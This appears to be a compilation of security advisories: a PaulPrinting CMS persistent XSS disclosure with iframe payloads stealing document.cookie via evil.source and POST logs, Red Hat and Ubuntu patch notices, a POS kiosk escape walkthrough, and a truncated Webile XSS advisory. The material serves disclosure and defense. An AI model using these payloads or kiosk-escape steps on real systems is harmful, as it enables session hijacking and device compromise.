PaulPrinting CMS suffers from persistent cross site scripting vulnerabilities.

Document Title:  
===============  
PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2285

Release Date:  
=============  
2023-07-19

Vulnerability Laboratory ID (VL-ID):  
====================================  
2285

Common Vulnerability Scoring System:  
====================================  
5.8

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface.

(Copy of the Homepage:https://codecanyon.net/user/codepaul  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application.

Affected Product(s):  
====================  
CodePaul  
Product: PaulPrinting (2018) - CMS (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-08-25: Researcher Notification & Coordination (Security Researcher)  
2022-08-26: Vendor Notification (Security Department)  
2022-**-**: Vendor Response/Feedback (Security Department)  
2022-**-**: Vendor Fix/Patch (Service Developer Team)  
2022-**-**: Security Acknowledgements (Security Department)  
2023-07-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Restricted Authentication (User Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.

The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code.  
After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins  
in the backend (listing).

The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own  
malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in  
the backend (listing).

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to  
malicious source and persistent manipulation of affected application modules.

Request Method(s):  
[+] POST

Vulnerable Module(s):  
[+] /printing/register  
[+] /account/delivery

Vulnerable Input(s):  
[+] First name  
[+] Last name  
[+] Address  
[+] City  
[+] State

Vulnerable Parameter(s):  
[+] firstname  
[+] lastname  
[+] address  
[+] city  
[+] state

Affected Module(s):  
[+] Frontend Settings (./printing/account/setting)  
[+] Frontend Delivery Address (./printing/account/delivery)  
[+] Backend User Preview Listing  
[+] Backend Delivery Address Contact Review

Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...  
1. Open your browser and start a http session tamper  
2. Register in the application by login click to register  
3. Inject to the marked vulnerable input fields your test payload  
4. Save the entry by submit via post method  
5. Login to the account and preview the settings  
Note: Administrators in the backend have the same wrong validated context that executes on preview of users  
6. The script code executes on preview of the profile - settings  
7. Successful reproduce of the first vulnerability!  
8. Followup by opening the Delivery address module  
9. Add a contact and add in the same vulnerable marked input fields your test payload  
Note: T he script code executes on each review of the address in the backend or user frontend  
10. Successful reproduce of the second vulnerability!

Exploitation: Payload  
"<iframe src=evil.source onload(alert(document.cookie)>  
"<iframe src=evil.source onload(alert(document.domain)>

--- PoC Session Logs (POST) ---  
https://paulprinting.localhost:8000/printing/account/setting  
Host: paulprinting.localhost:8000  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 357  
Origin:https://paulprinting.localhost:8000  
Connection: keep-alive  
Referer:https://paulprinting.localhost:8000/printing/account/setting  
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;  
POST:  
title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>>  
&lastname=b"<iframe src=evil.source onload(alert(document.cookie)>>  
&address=c"<iframe src=evil.source onload(alert(document.cookie)>>  
&city=d"<iframe src=evil.source onload(alert(document.cookie)>>  
&state=e"<iframe src=evil.source onload(alert(document.cookie)>>  
&zipcode=2342&country=BS&phone=23523515235235&save=Save  
-  
POST: HTTP/3.0 302 Found  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33  
location:https://paulprinting.localhost:8000/printing/account/setting?save=1  
-  
https://paulprinting.localhost:8000/printing/account/setting?save=1  
Host: paulprinting.localhost:8000  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Referer:https://paulprinting.localhost:8000/printing/account/setting  
Connection: keep-alive  
Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd;  
-  
POST: HTTP/3.0 200 OK  
content-type: text/html; charset=UTF-8  
x-powered-by: PHP/7.1.33

Vulnerable Source: Your Account - Settings  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">First name</label>  
<div class="col-sm-8">  
<input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<label class="col-sm-4 col-form-label">Last name</label>  
<div class="col-sm-8">  
<input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">Address</label>  
<div class="col-sm-8">  
<input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">City</label>  
<div class="col-sm-8">  
<input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>  
<div class="form-group row">  
<label class="col-sm-4 col-form-label">State</label>  
<div class="col-sm-8">  
<input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>">  
</div></div>

Vulnerable Source: Deliery Contact (Address)  
<table class="table">  
<thead>  
<tr>  
<th>Contact</th>  
<th>Address</th>  
<th>City</th>  
<th>State</th>  
<th>Country</th>  
<th></th>  
</tr>  
</thead>  
<tbody><tr>  
<td>a"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>b"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>c"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td>d"<iframe src=evil.source onload(alert(document.cookie)></td>  
<td></td>  
<td class="text-right">  
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>|  
<a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1"  onclick="return confirm('Delete')">Delete</a>  
</td></tr></tbody>  
</table>

Security Risk:  
==============  
The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

PaulPrinting CMS Cross Site Scripting

Red Hat Security Advisory 2023-4053-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the container images for Red Hat OpenShift Container Platform 4.11.45. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: OpenShift Container Platform 4.11.45 bug fix and security update  
Advisory ID:       RHSA-2023:4053-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4053  
Issue date:        2023-07-19  
CVE Names:         CVE-2019-17594 CVE-2019-17595 CVE-2019-18218   
                   CVE-2019-20838 CVE-2020-14155 CVE-2020-24370   
                   CVE-2020-35525 CVE-2020-35527 CVE-2021-3580   
                   CVE-2021-3634 CVE-2021-20231 CVE-2021-20232   
                   CVE-2021-23177 CVE-2021-31566 CVE-2021-36084   
                   CVE-2021-36085 CVE-2021-36086 CVE-2021-36087   
                   CVE-2021-40528 CVE-2022-1271 CVE-2022-1586   
                   CVE-2022-1785 CVE-2022-1897 CVE-2022-1927   
                   CVE-2022-4304 CVE-2022-4450 CVE-2022-21235   
                   CVE-2022-24407 CVE-2022-29824 CVE-2022-34903   
                   CVE-2022-37434 CVE-2022-38177 CVE-2022-38178   
                   CVE-2022-40674 CVE-2022-42010 CVE-2022-42011   
                   CVE-2022-42012 CVE-2022-42898 CVE-2022-47629   
                   CVE-2023-0215 CVE-2023-0361 CVE-2023-1281   
                   CVE-2023-24329 CVE-2023-32233   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.11.45 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.11.

Red Hat Product Security has rated this update as having a security impact  
of [impact]. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container  
Platform 4.11.45. See the following advisory for the RPM packages for this  
release:

https://access.redhat.com/errata/RHBA-2023:4052

Space precludes documenting all of the container images in this advisory.  
See the following Release Notes documentation, which will be updated  
shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

Security Fix(es):

* github.com/Masterminds/vcs: Command Injection via argument injection  
(CVE-2022-21235)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

3. Solution:

For OpenShift Container Platform 4.11 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

You may download the oc tool and use it to inspect release image metadata  
for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests  
may be found at  
https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.

The sha values for the release are

(For x86_64 architecture)  
The image digest is  
sha256:c6771b12bd873c0e3e5fbc7afa600d92079de6534dcb52f09cb1d22ee49608a9

(For s390x architecture)  
The image digest is  
sha256:622b5361f95d1d512ea84f363ac06155cbb9ee28e85ccaae1acd80b98b660fa8

(For ppc64le architecture)  
The image digest is  
sha256:50c131cf85dfb00f258af350a46b85eff8fb8084d3e1617520cd69b59caeaff7

(For aarch64 architecture)  
The image digest is  
sha256:9e575c4ece9caaf31acbef246ccad71959cd5bf634e7cb284b0849ddfa205ad7

All OpenShift Container Platform 4.11 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.11/updating/updating-cluster-cli.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2215317 - CVE-2022-21235 github.com/Masterminds/vcs: Command Injection via argument injection

5. JIRA issues fixed (https://issues.redhat.com/):

OCPBUGS-15446 - (release-4.11) gather "gateway-mode-config" config map from "openshift-network-operator" namespace  
OCPBUGS-15532 - visiting Configurations page returns error Cannot read properties of undefined (reading 'apiGroup')  
OCPBUGS-15645 - Can't use git lfs in BuildConfig git source with strategy Docker  
OCPBUGS-15739 - Environment cannot find Python  
OCPBUGS-15758 - [release-4.11] Bump Jenkins and Jenkins Agent Base image versions  
OCPBUGS-15942 - 9% of OKD tests failing on error: tag latest failed: Internal error occurred: registry.centos.org/dotnet/dotnet-31-centos7:latest: Get "https://registry.centos.org/v2/": dial tcp: lookup registry.centos.org on 172.30.0.10:53: no such host  
OCPBUGS-15966 - [4.12] MetalLB contains incorrect data Correct and incorrect MetalLB resources coexist should have correct statuses

6. References:

https://access.redhat.com/security/cve/CVE-2019-17594  
https://access.redhat.com/security/cve/CVE-2019-17595  
https://access.redhat.com/security/cve/CVE-2019-18218  
https://access.redhat.com/security/cve/CVE-2019-20838  
https://access.redhat.com/security/cve/CVE-2020-14155  
https://access.redhat.com/security/cve/CVE-2020-24370  
https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2021-3580  
https://access.redhat.com/security/cve/CVE-2021-3634  
https://access.redhat.com/security/cve/CVE-2021-20231  
https://access.redhat.com/security/cve/CVE-2021-20232  
https://access.redhat.com/security/cve/CVE-2021-23177  
https://access.redhat.com/security/cve/CVE-2021-31566  
https://access.redhat.com/security/cve/CVE-2021-36084  
https://access.redhat.com/security/cve/CVE-2021-36085  
https://access.redhat.com/security/cve/CVE-2021-36086  
https://access.redhat.com/security/cve/CVE-2021-36087  
https://access.redhat.com/security/cve/CVE-2021-40528  
https://access.redhat.com/security/cve/CVE-2022-1271  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2022-21235  
https://access.redhat.com/security/cve/CVE-2022-24407  
https://access.redhat.com/security/cve/CVE-2022-29824  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-38177  
https://access.redhat.com/security/cve/CVE-2022-38178  
https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0361  
https://access.redhat.com/security/cve/CVE-2023-1281  
https://access.redhat.com/security/cve/CVE-2023-24329  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important  
https://docs.openshift.com/container-platform/4.11/release_notes/ocp-4-11-release-notes.html

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkt2rsAAoJENzjgjWX9erEDZUP/34f/AgUOiiVZ6B7LrKb8xYN  
sEAom2h8cUMUzX2LLY0N/Wfa/Zhq555tRHaitThG/vJN5ETrPFu7gWoizisFLHWl  
ovCf5sDkSX0WAhVywcdJIxLOge9Mt719HJk+zX5edhHMQMrmfZ7YVR55DAODnwuX  
2nj6DR2XixfK1INosMoZm/xtZg+e6v9fzMY6oTCeAufyaim3YAbZwi3Kmdj0ye4s  
/y6ooyaZIzTzNTRhTwYsIGrHBZwr1NUt8RnVxX4XMID1HWHf3gAcEy1dez9QnSIp  
BFzEweZS51cpA0Dn1/AQrK7F+NYLFhdZNlPCDJj+DRSHwDbb0CgcDrFk0otufkYy  
fNOumjMCTj+IdLQpiLSPXRjN1krbg1FdlqlBKRBNgXMYAicticrMMm9jGcggmbOE  
N84ANhaamgzw+IElEByihieVO/81alQYZP9TjT8Wfu+CSGvHUP4DnCLvJYCuRaeg  
oIc8ItWfzoVBMVizzOK8Dei5Bvg8ZrVG7ePAyQP0gtYlAJQ/pE5BLEhJXSLlvyGb  
0Wd/Sj0djLTn8ADV8TvA7NfwyxbU8ce3IhuS7zvtGqpFRWb0kYoYh+16Onmhq5iw  
X/Jd9JqAWknGjZfy3OHa8kFgVnq5qqNmI3wGBRKs4gUOoxrceUXMFR3YbUxuU9Lp  
129R2QWY1i5pRtAPA1gV  
=OZCr  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4053-01

Aures Booking and POS Terminal suffers from a local privilege escalation vulnerability.

Document Title:  
===============  
Aures Booking & POS Terminal - Local Privilege Escalation

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2323

Release Date:  
=============  
2023-07-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2323

Common Vulnerability Scoring System:  
====================================  
7.2

Vulnerability Class:  
====================  
Privilege Escalation

Current Estimated Price:  
========================  
3.000€ - 4.000€

Product & Service Introduction:  
===============================  
KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or  
freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk  
features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner.  
With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to  
manage customer cards and promotions. Queue management can also be optimized.

(Copy of the Homepage:https://aures.com/de/komet/  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of  
the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh.

Affected Product(s):  
====================  
Aures Technologies GmbH  
Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise)

Vulnerability Disclosure Timeline:  
==================================  
2023-05-09: Researcher Notification & Coordination (Security Researcher)  
2023-07-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Local

Severity Level:  
===============  
High

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
No User Interaction

Disclosure Type:  
================  
Responsible Disclosure

Technical Details & Description:  
================================  
A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal  
(Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers  
to bypass the kiosk mode to compromise the local file system and applications.

It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are  
able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security  
vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local  
privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate  
local file-system information of the compromised windows based operating system.

No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system  
vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access.

Vulnerable Operating System(s):  
[+] Windows 10 (IoT Enterprise)

Affected Component(s):  
[+] Context Menu

Affected Function(s):  
[+] Web Search  
[+] Share (Teilen)

Proof of Concept (PoC):  
=======================  
The local vulnerability can be exploited by local attackers with physical device access without user interaction.  
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet  
Touch Display => Select Food Item => Highlight Text  
=> Open Context Menu => Extend Context Menu => Web-Search  
=> Browser => Local File System => Compromised!

Manual steps to reproduce the vulnerability ...  
01.  First touch the monitor display to move on from standby  
02.  Select an food item from the menu of immergrün (we recomment the cesar wraps)  
03.  Push the information button of the selected food item  
04.  Push twice via touch to mark the selected food item text  
05.  Press a third time after you have marked the context by holding it down on the touch display  
06.  Now the function context menu of the operating system for highlighted text appears  
07.  On the context menu appearing 3 dots to extend the visible function menu  
08.  Select the web-search or share function for the highlighted content in the context menu  
09.  The browser of the operating system opens on the main front screen  
10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files)  
10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context)  
10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information)  
10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion)  
10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.)  
10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols  
10.7 Attackers are able to perform man in the middle attacks from the local computer system  
11.0 Successful reproduce of the security vulnerability!

Reference(s): Pictures  
- 1.png (Terminal A)  
- 2.png (Terminal B)  
- 3.png (Escape)  
- 4.png (Awareness)

Solution - Fix & Patch:  
=======================  
The security vulnerabilities can be patched by following steps:  
1.  Disable the content menu to extend  
2.  Disable the context menu  
3.  Disable web-search  
4.  Disable to mark text inputs & texts  
5.  Disallow to open not white listed websites  
6.  Disable to download files  
7.  Restrict the web-browser access  
8.  Disallow the file browser  
9.  Disable the browser debug modus  
10. Reconfigure the local firewall to allow and disallow connections  
11. Change the access permission to prevent exfiltration

Security Risk:  
==============  
The security risk of the vulnerability in the local booking and payment terminal system is considered high.  
The issue can be easily exploited by local attackers with simple interaction via the touch display.  
Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse  
it for further simple or more complex attack scenarios.

Credits & Authors:  
==================  
Benjamin Mejri (Kunz)   -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.  
Lars Guenther     -https://www.vulnerability-lab.com/show.php?user=L.+Guenther

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Aures Booking And POS Terminal Local Privilege Escalation

Ubuntu Security Notice 6236-1 - It was discovered that ConnMan could be made to write out of bounds. A remote attacker could possibly use this issue to cause ConnMan to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS. It was discovered that ConnMan could be made to leak sensitive information via the gdhcp component. A remote attacker could possibly use this issue to obtain information for further exploitation. This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS.

    ==========================================================================Ubuntu Security Notice USN-6236-1July 19, 2023connman vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:Several security issues were fixed in ConnMan.Software Description:- connman: Intel Connection Manager daemonDetails:It was discovered that ConnMan could be made to write out of bounds. Aremote attacker could possibly use this issue to cause ConnMan to crash,resulting in a denial of service, or possibly execute arbitrary code. Thisissue only affected Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.(CVE-2021-26675, CVE-2021-33833)It was discovered that ConnMan could be made to leak sensitive informationvia the gdhcp component. A remote attacker could possibly use this issueto obtain information for further exploitation. This issue only affectedUbuntu 16.04 LTS, Ubuntu 18.04 LTS, and Ubuntu 20.04 LTS. (CVE-2021-26676)It was discovered that ConnMan could be made to read out of bounds. Aremote attacker could possibly use this issue to case ConnMan to crash,resulting in a denial of service. This issue only affected Ubuntu 16.04LTS, Ubuntu 18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS.(CVE-2022-23096, CVE-2022-23097)It was discovered that ConnMan could be made to run into an infinite loop.A remote attacker could possibly use this issue to cause ConnMan toconsume resources and to stop operating, resulting in a denial of service.This issue only affected Ubuntu 16.04 LTS, Ubuntu 18.04 LTS, Ubuntu 20.04LTS, and Ubuntu 22.04 LTS. (CVE-2022-23098)It was discovered that ConnMan could be made to write out of bounds viathe gweb component. A remote attacker could possibly use this issue tocause ConnMan to crash, resulting in a denial of service, or possiblyexecute arbitrary code. This issue only affected Ubuntu 16.04 LTS, Ubuntu18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. (CVE-2022-32292)It was discovered that ConnMan did not properly manage memory undercertain circumstances. A remote attacker could possibly use this issue tocause ConnMan to crash, resulting in a denial of service, or possiblyexecute arbitrary code. This issue only affected Ubuntu 16.04 LTS, Ubuntu18.04 LTS, Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. (CVE-2022-32293)It was discovered that ConnMan could be made to write out of bounds viathe gdhcp component. A remote attacker could possibly use this issue tocause ConnMan to crash, resulting in a denial of service, or possiblyexecute arbitrary code. (CVE-2023-28488)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   connman                         1.41-2ubuntu0.23.04.1Ubuntu 22.04 LTS:   connman                         1.36-2.3ubuntu0.1Ubuntu 20.04 LTS:   connman                         1.36-2ubuntu0.1Ubuntu 18.04 LTS (Available with Ubuntu Pro):   connman                         1.35-6ubuntu0.1~esm1Ubuntu 16.04 LTS (Available with Ubuntu Pro):   connman                         1.21-1.2+deb8u1ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6236-1   CVE-2021-26675, CVE-2021-26676, CVE-2021-33833, CVE-2022-23096,   CVE-2022-23097, CVE-2022-23098, CVE-2022-32292, CVE-2022-32293,   CVE-2023-28488Package Information:https://launchpad.net/ubuntu/+source/connman/1.41-2ubuntu0.23.04.1   https://launchpad.net/ubuntu/+source/connman/1.36-2.3ubuntu0.1   https://launchpad.net/ubuntu/+source/connman/1.36-2ubuntu0.1

Ubuntu Security Notice USN-6236-1

Webile version 1.0.1 suffers from multiple cross site scripting vulnerabilities.

    Document Title:===============Webile v1.0.1 - Multiple Cross Site Web VulnerabilitiesReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2321Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2321Common Vulnerability Scoring System:====================================5.5Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the Webile v1.0.1 Wifi mobile android web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-10-11: Researcher Notification & Coordination (Security Researcher)2022-10-12: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (Guest Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================Multiple persistent input validation web vulnerabilities has been discoveredin the Webile v1.0.1 Wifi mobile android web application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser toweb-application requests from the application-side.The persistent input validation web vulnerabilities are located in the send and add function. Remote attackers are able to inject own maliciousscript codes to the new_file_name and i parameter post method request to provoke a persistent execution of the malformed content.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicioussource 